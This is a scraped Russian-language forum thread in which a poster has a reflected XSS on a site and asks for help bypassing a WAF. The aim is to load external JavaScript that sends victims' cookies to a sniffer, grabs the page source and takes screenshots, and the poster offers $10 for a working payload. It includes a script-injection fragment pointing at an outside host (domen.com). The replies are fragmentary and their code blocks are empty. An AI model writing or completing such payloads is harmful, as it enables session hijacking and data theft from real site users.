![]() |
Приветствую.
Имеется: XSS вида, https://host.com/parametr?i='/>XSS Задача Обойти фильтр и подгрузить js код с хоста https://site.com/, в нем передача cookie на сниффер, парсинг исходного кода страницы и скриншот страницы. Работает: , Фильтр: WAF фильтрует теги указанные ниже, в base64 не отрабатывает. Код:
Код:
javascript:Код:
var s = document.createElement('script'); s.src='https://domen.com/1Код:
Буду премного благодарен за помощь в написании правильного пайлода с img для исполнения js кода с хоста. p.s за работоспособное решение оплачу 10$ на кофе |
up.сработал
Код:
|
Серебрянной пули нет, нужно фантазировать. Например:
Код:
|
| Время: 15:41 |